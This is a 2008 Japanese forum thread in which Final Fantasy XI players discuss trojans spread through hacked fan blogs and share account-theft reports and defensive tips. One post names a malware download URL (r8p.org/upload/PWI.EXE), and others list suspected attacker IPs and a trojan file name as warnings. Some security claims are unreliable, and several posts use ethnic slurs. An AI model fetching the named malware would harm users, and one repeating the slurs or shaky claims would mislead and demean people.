169 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:03:27.16 ID:NX6Uk0kR]
>>167
まだペコログにトロイ残ってるのかな?

170 名前:既にその名前は使われています [2008/03/24(月) 13:05:26.80 ID:O+2gK/uP]
>>169
もう大丈夫なのかな><
カスペの無料体験ルーレットが90日引けなくてリトライ祭してたところ。。



171 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:10:26.54 ID:NX6Uk0kR]
>>170
前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。

172 名前:既にその名前は使われています [2008/03/24(月) 13:11:05.57 ID:13N6BdxD]
スクエニはいつまで静観してるつもりだろうな…
被害が一気に増えたりでもしら悪い意味で有名になるだろうに…

173 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:13:25.17 ID:zZKH+Aj5]
つうかマンガ喫茶とかつかうほうがアホなんだろ
自宅だけにして、LSコミュニティも利用しないほうがいい


174 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:21:38.03 ID:HWQPHJQs]
>>154
お前のかおもじが気に入らない

175 名前:既にその名前は使われています [2008/03/24(月) 13:23:13.70 ID:Q/ktx4QO]
>>170
こんなのもあるぜ? 左側に30日体験のバナーがある。
ttp://www.mcafee.com/japan/mcafee/home/

176 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:49:30.88 ID:vtt50urT]
dda3■net、hellh■netに続くfccja■comのトロイのスキャン。
各社への検体提出から23時間経過。
Kasperskyに続きAntiVirも撃墜するようになったものの、そこから変化なし。
ttp://www.virustotal.com/analisis/ae4b34f1f08f6dd6d93f3574b1fe6f04

177 名前:既にその名前は使われています [2008/03/24(月) 13:51:50.72 ID:47bjLYLG]
ペコろぐソース見てきたけど、自分で見た限りでは変なスクリプトはなかった感じ。
3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。

まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは
気をつけないとだねぇ。

178 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 13:55:10.96 ID:vtt50urT]
ペコろぐ。 (罠撤去済み)
ヴァナモンblog (罠撤去済み)
FF11初心者の館 (ウイルス散布中)

179 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 14:09:41.96 ID:37tZuH3A]
もうFC2はソースチェッカーでチェックしてからじゃないと
怖くて踏めないな...

180 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 14:11:42.90 ID:37tZuH3A]
>>170

pc11.2ch.net/test/read.cgi/sec/1205842090/719



181 名前:既にその名前は使われています [2008/03/24(月) 14:31:36.43 ID:vTR+hCx8]
注意age

182 名前:既にその名前は使われています [2008/03/24(月) 14:34:20.69 ID:Httpif6H]
ぶっちゃけFC2側としてはたいして被害あるわけじゃないから
必死こく必要ないんだよなぁ

183 名前:既にその名前は使われています [2008/03/24(月) 14:45:51.90 ID:Ny3ZGjXA]
とりあえず俺もHDD24時間稼働で1年経つし寿命ついでにOS再インスコしよう

そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……

184 名前:既にその名前は使われています [2008/03/24(月) 14:47:10.45 ID:WdMLKCJz]
ほんっとにロクなもん混入しねえなあいつらwww

185 名前:既にその名前は使われています [2008/03/24(月) 14:53:21.20 ID:sI0/2XTk]
「中国 混入」でググったら

予想を遥かに超えていた

186 名前:既にその名前は使われています [2008/03/24(月) 14:56:30.58 ID:Httpif6H]
俺のIDもウィルススキャンしてくだしあ;

187 名前:既にその名前は使われています [2008/03/24(月) 15:02:06.20 ID:sV5MTkg6]
俺の肛門もハックされそうだ!

188 名前:既にその名前は使われています [2008/03/24(月) 15:02:26.35 ID:sI0/2XTk]
>>186
>>186
>>186

なにIDにURLとか貼ってるわけ?今時誰も踏まねーよプgr


189 名前:既にその名前は使われています [2008/03/24(月) 15:03:52.97 ID:8jcNID1A]
ドリコムに作られた罠サイトを連絡フォームで通報した
先ほど、閲覧制限を掛けたとメールで連絡が来た

ff11xicng●blog●drecom●jp/
ff11hdiw●blog●drecom●jp/
閲覧制限確認

190 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 15:15:39.10 ID:zZKH+Aj5]
しかし10年前とかは輸出食品が劣悪ということはなかったんだよな
人増えすぎるとよくないな




191 名前:既にその名前は使われています [2008/03/24(月) 15:31:47.67 ID:+jpHHFib]
>>95
そもそもMacはウイルスやマルウェアに
事実上感染しないんだから必要ないんだが。

192 名前:既にその名前は使われています [2008/03/24(月) 15:38:27.74 ID:+jpHHFib]
>>148
おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
 ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。

ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。

193 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 15:39:32.08 ID:RgZ1LaTX]
>>191
数年前にやってたMacのTVCM思い出したよ。

「Macはウィルスに感染しないんだ!」って奴。
相手にされてないだけだろ、とテレビに向かって突っ込んだ記憶があるw

194 名前:既にその名前は使われています [2008/03/24(月) 15:41:14.29 ID:+jpHHFib]
>>162
おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。

195 名前:既にその名前は使われています [2008/03/24(月) 15:42:23.89 ID:Q/ktx4QO]
>>193
相手にしなさんな(´д`)

196 名前:既にその名前は使われています [2008/03/24(月) 15:44:19.68 ID:+jpHHFib]
>>193
理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。

日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。

197 名前:既にその名前は使われています [2008/03/24(月) 15:45:03.69 ID:Q/ktx4QO]
>>194
>入浴して
マウスだかコントローラだかを行水させちゃまずいだろw

198 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 15:48:04.35 ID:gNFuY07B]
烏の行水ならぬ鼠の行水・・・
【サンダー】【ショック】【気をつけてください。】

199 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 15:51:14.37 ID:vtt50urT]
>>196
わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?

200 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 15:58:21.63 ID:xrdpbYwi]
>>199
煽ってるの判ってるならスルーしれ。
いつも沸いてる既知外だろ。



201 名前:既にその名前は使われています [2008/03/24(月) 16:00:56.88 ID:+jpHHFib]
>>199
そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。

202 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 16:08:00.40 ID:UwqirNKw]
なんつうか、防衛対策まともにとれないなら
PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい

203 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 16:14:33.20 ID:+JYA+CIb]
専ブラでID抽出するとテラワロスw

204 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 16:14:57.46 ID:uo1cC9cX]
パス変更した時に、盗まれるってのは、ある?

205 名前:既にその名前は使われています [2008/03/24(月) 16:18:28.67 ID:TvxgTMvM]
>>204
すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに>>194の方法で変更するのが吉。

206 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 16:50:57.84 ID:vtt50urT]
>>205
> 99%以上が キーロガータイプではなく、
>パスワード保存ファイルを直接 盗んでいくタイプ

断言するのは危険。Winsock2のLSPにくっついてパケットキャプチャする
(保存していようが手入力しようが関係無い)タイプはずいぶん前から投入されている
(リネージュ等のネトゲアカウントハックにも、それ以外にも広く使われている)。
ttp://www.mcafee.com/japan/security/virG2007.asp?v=Generic%20LSP
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-210538
ちなみにこのタイプは手動で該当ファイルを削除すると
通信不能になって涙目になったりする。

207 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 16:52:59.19 ID:vtt50urT]
キーロガー型が現状少ないのはそのとおり。
余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に
マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで
先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた
(のでBOTNEWSなどでは「いまさら…」感があった)。

208 名前:既にその名前は使われています [2008/03/24(月) 17:09:06.90 ID:C2NTmBz4]
夕べからこのスレ参考にして自分のPCにNoScriptとPeerGuardian導入
したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に
ならなくなってビビッタ。
どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は
Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が
起こるなんて事ってある?
一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に
できて、今Avastでスキャン中。

209 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 17:21:09.00 ID:vtt50urT]
原理的には可能だけど、まずないと思う。

210 名前:既にその名前は使われています [2008/03/24(月) 17:22:32.78 ID:Q/ktx4QO]
>>208
妄想が豊かでうらやましいわw



211 名前:既にその名前は使われています [2008/03/24(月) 17:26:57.16 ID:C2NTmBz4]
>>209
ですよねー。
>>210
あまりにもタイミングが良すぎで焦ったのよw

212 名前:既にその名前は使われています [2008/03/24(月) 17:34:35.33 ID:zErWARNN]
UchinoLSの準はいじんwが
「垢ハック?あり得ねぇwww」
「される奴って馬鹿?w」
「FF専用PC用意すればいいのに馬鹿じゃねwww」
とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。
LS掲示板で騒いでた。

213 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 17:35:58.73 ID:vtt50urT]
FF専用PC用意してなかったんだね(´・ω・`)

214 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 17:38:06.93 ID:zZKH+Aj5]
>>212
自業自得だな
タル暗と同じレベルではずかしい

215 名前:既にその名前は使われています [2008/03/24(月) 17:42:19.74 ID:T6Wahbt1]
垢ハックされたかもwwww

216 名前:既にその名前は使われています [2008/03/24(月) 17:46:25.63 ID:KodraVfX]
垢ファックされた><

217 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 17:53:18.88 ID:76dNoHqz]
PG2インスコしたらFFも弾くんだなワロタ

218 名前:既にその名前は使われています [2008/03/24(月) 18:00:45.95 ID:Fm9VlWLZ]
パスをスクリーンキーボードで入力したいんだけど
PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)

219 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:06:10.11 ID:vtt50urT]
アクセサリのユーザー補助。
アプリの追加で入れないと無いかも。

220 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:10:09.72 ID:HWQPHJQs]
>>217
はじかねぇよw



221 名前:既にその名前は使われています [2008/03/24(月) 18:10:44.01 ID:Fm9VlWLZ]
そうなのか! 
ありがとう入れてくるは

222 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:22:05.69 ID:76dNoHqz]
>>220
接続すらできなくなるよ
初心者の俺にはPS2がお似合いなのかw

223 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:23:48.81 ID:mvpeqCeH]
先日ハックされました、ノートン最新状態で無反応。
FF立ち上げたらインストールディスクを入れろと指示されFF開始できない
CDもってきたら普通に起動、しかしIDやパスを再入力する状態
そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww
セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・
GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話
やっとGM来てキャラを即停止してもらい本人確認後キャラ返還
ギルや高額アイテムは一切無しの状態でした
ウイルスソフトで再サーチ+FFをインスコ
だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断
HDを初期化し終結・・・・・・

GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、
ということは何も戻ってこないということじゃんwwwwwww

不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・
GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!


224 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:27:19.70 ID:lMomuAcj]
>>222
前スレで詳しくわかんないならP2Pを許可するにしる
とか見たきがする

225 名前:既にその名前は使われています [2008/03/24(月) 18:29:27.04 ID:8bfKIyLi]
いい加減、公式のトップページで注意喚起を促す文章載せろよクソエニ

226 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:30:54.19 ID:zZKH+Aj5]
>>223
ネットカフェは利用してないだろうな?
してたら間違いなくそこだ

227 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:31:17.01 ID:+JYA+CIb]
>>222
PG2 FFXI でぐぐれば幸せになれる

228 名前:既にその名前は使われています [2008/03/24(月) 18:31:35.14 ID:f8U+hHlG]
インしたら数行垂れ流すだけでも随分違うのにな

229 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:34:27.81 ID:uo1cC9cX]
もう誰かが、シャウトで、伝えるて問題を大きくするしかないな

230 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:45:05.56 ID:lMomuAcj]
>>226
オチケツ、ネットカフェ使っても自宅PCのFFがCD入れろなんて言わないだろう。
きっと改ざんされたHPからトロイ入れられたんじゃないだろうか。



231 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 18:51:29.02 ID:ExAbIYmH]
www.playonline.com/ff11/polnews/news12892.shtml
何か対応してくれる!? わけねーかw

232 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:02:15.55 ID:vQXYTLxz]
>>223
ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。

233 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:04:25.59 ID:QdOH9ZPy]
韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?

234 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:05:52.25 ID:zZKH+Aj5]
ttp://www.playonline.com/ff11/rule/imgs/impb.jpg

したのうはは表情ふざけてんのか

235 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:06:50.04 ID:zZKH+Aj5]
>>233
それ新手の罠か?


236 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:08:48.26 ID:+JYA+CIb]
とりあえず、書き込んだあとに自分のID確認してみような

237 名前:既にその名前は使われています [2008/03/24(月) 19:16:24.20 ID:0G3UgKbW]
Temporary Internet Filesの中の1つのファイルが 感染: Trojan-Downloader.VBS.Small.gn
と診断されました
マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが
最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました
そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが
このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません
中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです
ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか?
削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?

238 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:20:12.37 ID:4CoULjpF]
POLに適当なIDとパス入れた状態でアカハックさせればよくね

239 名前:既にその名前は使われています [2008/03/24(月) 19:21:31.66 ID:8jcNID1A]
>>233
Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe

240 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 19:43:53.89 ID:QdOH9ZPy]
>>239
ありがとうございまs
tracert“s”.exeはありませんでした
PG2が真っ赤なログで不安すぎる・・・



241 名前:既にその名前は使われています [2008/03/24(月) 20:07:11.96 ID:Q/ktx4QO]
>>237
>>29
過去ログ読め

242 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 20:09:17.22 ID:AM88sWcX]
マックでもアカハックされるの?マックにしようかなw

243 名前:既にその名前は使われています [2008/03/24(月) 20:14:02.64 ID:vznh5385]
カスペルオンラインスキャナ走らせたのだが、結果のレポートのところで
感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて
ウィルス名のところに「ロックされています」て出てるのだが、これは何故?

244 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 20:34:48.78 ID:+JYA+CIb]
>>243
検査できませんでしたってログ

245 名前:既にその名前は使われています [2008/03/24(月) 20:37:12.64 ID:8jcNID1A]
>>240
ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです

>>243
ほかのプログラムが使用中で開けないか削除できないから

246 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 20:49:03.81 ID:nqpgFFzc]
今月のパス抜きで可能性あるのは3月上旬あたりと中旬以降に該当サイトにアクセスした人間全員?
アクセス数から考えて、
アクセスしたけどん抜かれてない人が大多数だと思うんだけど、
その辺を分けてるものはなんだろ。
windows Update最新だと感染しないとかなのかな。

247 名前:既にその名前は使われています [2008/03/24(月) 20:54:25.34 ID:kh97SrbK]
>>246
・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。

等々。

248 名前:既にその名前は使われています [2008/03/24(月) 20:55:46.56 ID:lzZx8A86]
>>233
>韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?

58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。

逆に>>233のPCから、58.227.193.190へアクセスしてるなら、>>245氏の言うとおり
何か仕込まれてるのかも。

249 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 20:58:51.08 ID:J6GiBSTn]
>>233
ちょっと調べてみたが、韓国のスパムメール業者のIPらしいな。
なんかPCに入ってないか?

250 名前:既にその名前は使われています [2008/03/24(月) 21:50:03.03 ID:47bjLYLG]
定期保守上げを。



251 名前:既にその名前は使われています [2008/03/24(月) 21:53:37.87 ID:UcF3Od6M]
NOD32でも駆除できる?

252 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 22:12:42.15 ID:QdOH9ZPy]
Backdoor.Out Break  nk210-201-139-91.static.apol.com.tw
感染しまくりのようです orz

253 名前:既にその名前は使われています [2008/03/24(月) 22:14:23.47 ID:CHzqP0my]
バハ鯖でまた垢ハック

254 名前:既にその名前は使われています [2008/03/24(月) 22:15:19.89 ID:hdKDzAOI]
>>95
Mac用のPG2だけど英語版…
phoenixlabs.org/pgosx/

255 名前:既にその名前は使われています [2008/03/24(月) 22:28:28.26 ID:7DTVIQ6X]
ネ実にわざわざ報告に来る人なんて被害者の100分の1くらいだろうし、実害数を考えると恐ろしい
さて本営は何時までだんまりを決め込むのやら

256 名前:既にその名前は使われています [2008/03/24(月) 22:31:14.88 ID:0jHdHBFL]
業者対策へ本腰入れるのに3,4年掛かってるからな
1年後に対策したとしても、早いくらいだなw

257 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 22:32:35.55 ID:tcfmCYoK]
>>253
えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー

事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?

んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?

258 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 22:37:56.69 ID:pye7laJB]
パスをスクリーンキーボードで打ち込むようにしたんだが、
流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?

259 名前:既にその名前は使われています [2008/03/24(月) 22:39:07.41 ID:0U03pW8G]
>>258
今のところFF11の垢ハックのためのものは出てない、と思いたい

260 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 22:40:19.27 ID:pye7laJB]
他のはあるのかよwwwwwww


恐ろしいな マジで



261 名前:既にその名前は使われています [2008/03/24(月) 22:40:43.61 ID:GcBBAZhm]
原因究明・セキュリティの強化を
ttp://blog.fc2.com/forum/viewtopic.php?t=20829

FC2ユーザーフォーラムにスレが立った。
実際に被害に遭ったブログ主はここで経緯と状況を説明してもらえないだろうか。
第三者が伝聞で書き込みしていても意味が無い。

262 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 22:59:32.30 ID:vtt50urT]
>>251
無理。AntiVirならできる

263 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 23:05:25.00 ID:tcfmCYoK]
>>261
fc2ってだけでアクセスしたくないなw

264 名前:既にその名前は使われています [2008/03/24(月) 23:19:20.01 ID:Yd7XwcSP]
ノートン2008+PeerGuardian2で韓国やら香港やら厨国蹴って
ZoneAlarmでファイアウォールを有効にして
パスは手打ちで9桁。ブラウザはSleipnir
WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない

これでも抜かれるサイト踏んだらまず抜かれます?

ていうかPeerGuardian2入れてみてビビッタ
別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・



265 名前:既にその名前は使われています [2008/03/24(月) 23:25:51.11 ID:qfZn+dai]
>>263
冗談抜きで同意するは

266 名前:既にその名前は使われています [2008/03/24(月) 23:32:02.13 ID:lzZx8A86]
>>252
これかな。
spywaredetector.net/spyware_encyclopedia/Backdoor.Out%20Break.htm

残念だけど、バックドア仕込まれてたっぽいね。
FFと関係あるのかは不明だけど、>>249のスパム業者だったら、
スパムメールの送信端末とかにされてたのかも。

駆除するか、心配なら駆除した後でOSクリーンインストールして
おいたほうが安全だと思う。

267 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 23:38:25.28 ID:vtt50urT]
>>261
そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。

268 名前:既にその名前は使われています [2008/03/24(月) 23:40:22.20 ID:ApBIgGA/]
仕事から帰ってきたらPOLパスワード変えられてました。
フレにGM呼んでもらって待ってるとこですが、
自キャラがどうやらログインしてる模様です。
なんだかなぁ・・・。

269 名前:既にその名前は使われています [2008/03/24(月) 23:42:00.79 ID:We8pVkNe]
>>268
アチャ・・・(ノ_< ;)
早くGM来て行動止めてもらえるといいな

270 名前:既にその名前は使われています [2008/03/24(月) 23:44:12.74 ID:+KW5+qyc]
jbbs.livedoor.jp/game/21862/
尻鯖板は管理人自身が業者ということが判明している
いちおう張って置きますね



271 名前:既にその名前は使われています [2008/03/24(月) 23:44:47.78 ID:T6Wahbt1]
>>215でハックされたかもって言ったものだけどマジデされてた。
装備がエクレア品以外全部売られてて所持金が雀の涙ほどになってた。
マジデショックって言うかなんだかなぁって感じになるね

272 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 23:44:52.61 ID:tcfmCYoK]
スクエニ様〜おねげぇデスじゃ〜24時間窓口作ってくだされぇ〜〜ッて感じだよね

273 名前:268 [2008/03/24(月) 23:46:54.93 ID:ApBIgGA/]
>>269
80件以上待ちだということです。
倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・

274 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 23:48:54.82 ID:We8pVkNe]
>>273
それムカツクな
暫定でもいいからしばらく窓口を24時間にしてほしい

275 名前:既にその名前は使われています [2008/03/24(月) 23:51:06.74 ID:rpE40Jdl]
そういえば、前ここでハックされたって報告来てた人が、2垢でGMコール呼びながら
のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって
英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね

276 名前:既にその名前は使われています [2008/03/24(月) 23:53:57.19 ID:1ggkpLWR]
>>274
もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。

一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。

277 名前:既にその名前は使われています [2008/03/24(月) 23:56:33.23 ID:u0FcALPC]
解約→FFアンインスコ
これが最大の防衛策に思えてきた

他のゲームならハックされたら公式HPでパスワード忘れた
→新パスワードがメールで送られてくる
→自分でログインしてINしてる業者落とす
→公式HPでパス再発行、ここでメール受け取らなきゃ安全
 OS再インスコ
これ24時間できたりするのよ

ハックされた人は面倒でもちゃんと警察に届けてね
届けないと□は「あなたが業者にパスとID教えた」
とみなすから

278 名前:既にその名前は使われています [2008/03/24(月) 23:57:04.89 ID:DyD4MS3I]
久しぶりにログインしたらキャラが裸だったとか
今後続きそうだな

279 名前:既にその名前は使われています [2008/03/25(火) 00:00:11.53 ID:8jcNID1A]
今月見つかったRealPlayerのActiveXコントロールの穴は
11.0.2でふさがったらしい
確証はないけど、今回の垢ハック騒動はこの穴も使われているかも

最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから
アンインストール推奨だけどな

280 名前:既にその名前は使われています [2008/03/25(火) 00:01:19.87 ID:mx3cOLzk]
>>268のフレです。
まだGM待ちです。
たぶん、GMじゃ役に立たないだろうけど、思いだけは伝えようかと。



281 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 00:05:41.63 ID:N6twjFNK]
>>280
ガンガレ!
あと早急に対策をしてほしいって念を押して下さい
毎日ハック報告を見るのは辛すぎる

282 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 00:05:51.11 ID:r19OMXfd]
今現在動いてる厨蚊がいるなら天安門事件なりなんなり、
そのあたりの言葉でログ埋め尽くしてやりたい気分だな。
その手の言葉、詳しくないからあまり知らないが・・・。

283 名前:既にその名前は使われています [2008/03/25(火) 00:05:58.27 ID:GeAvoS1Q]
ブログも一切見て無いが、やっぱり怖いよな・・・
本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど
そのうちとられたりするんじゃ無いかと思うと怖い・・・



284 名前:既にその名前は使われています [2008/03/25(火) 00:07:24.68 ID:WD+HwGs7]
>>283
今すぐカスペルオンラインスキャナするんだ!

285 名前:既にその名前は使われています [2008/03/25(火) 00:08:09.82 ID:sGs0zFvT]
バハ板も現在進行形でハック実況されてるなあ。
今回のメンテでなんとかして欲しいよ。

286 名前:既にその名前は使われています [2008/03/25(火) 00:08:16.82 ID:GeAvoS1Q]
>>284
したよ。ノートン共に0
火狐でNoscriptも入れてる

287 名前:既にその名前は使われています [2008/03/25(火) 00:10:11.47 ID:j2GSQhJ6]
白門でEでPT希望出してるKeycle

288 名前:既にその名前は使われています [2008/03/25(火) 00:10:28.66 ID:8nsrrYgI]
PS2&箱ユーザーだけど、ここみて背筋が寒くなったので、POLにインする際に
メンバーパスワードを入れるようにしたよ。

289 名前:既にその名前は使われています [2008/03/25(火) 00:10:30.53 ID:WD+HwGs7]
>>286
スキャナでトロイ出無いてことは、今は取られてないんじゃない?

290 名前:268 [2008/03/25(火) 00:10:35.61 ID:HuadLiyJ]
>>274
窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。

私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。

ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。

※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。



291 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 00:11:18.51 ID:g7f8T3fx]
Realpleyerの穴ってリアルプレイヤインスコしてなかったら無関係?
俺最近PCかい直してRPそのまま入れてないんだけど。

292 名前:既にその名前は使われています [2008/03/25(火) 00:12:32.76 ID:ZVcNVdfz]
専ブラで見たらレス数少ないクソスレ乱立しまくりだな
ネ実は24時間あげあげあげえええ


293 名前:既にその名前は使われています [2008/03/25(火) 00:12:33.76 ID:GeAvoS1Q]
>>289
まぁ、ブログはまったく見て無いからねw
でも、何か怖いよね・・・・
まったく関係の無いHPにまで仕込まれたりしてたらどうにもならんし・・・



294 名前:268 [2008/03/25(火) 00:14:14.08 ID:HuadLiyJ]
>>280
さんくす!!
なんという掲示板の私的利用w

これ以上犠牲者を増やさないように
